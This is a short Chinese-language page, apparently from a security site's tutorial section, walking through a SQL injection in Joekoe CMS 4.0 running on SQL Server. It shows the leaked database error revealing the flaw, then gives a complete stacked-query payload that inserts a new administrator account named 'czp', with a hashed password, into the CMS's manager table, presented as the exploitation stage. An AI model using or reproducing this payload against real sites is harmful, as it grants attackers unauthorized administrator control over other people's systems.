动画介绍:Joekoe CMS 4.0
错误信息:
select count(*) from db_sys_review where nsort=’article’’ and iid=0 and r_hidden=1
原始错误:
Error #-2147217900, 字符串 ’article’ and iid=0 and r_hidden=1’ 之前有未闭合的引号。 Microsoft OLE DB Provider for SQL Server
返回首页
Processed in 0.031 s, 1 queries, 34 Cache.
报错...说明..有漏洞...不过这个漏洞 只能用于SQL版本..
好了 现在到利用阶段....
构造函数:
提交“;insert into db_sys_manager (m_user,m_password,m_grade,m_hidden) values(’czp’,’526a568e057b69f9’,10,0);--”
定义:在数据库池里新建一个用户为czp密码为czp的用户
这句注入语句的意思是..执行一句SQL 语句..在数据库里加入一个账户,而且是管理员的账户
为:czp 密码:526a568e057b69f9 这是用MD5加密了...
密码和用户都是:czp |
安全中国首页 > 动画中心 > 综合注入动画
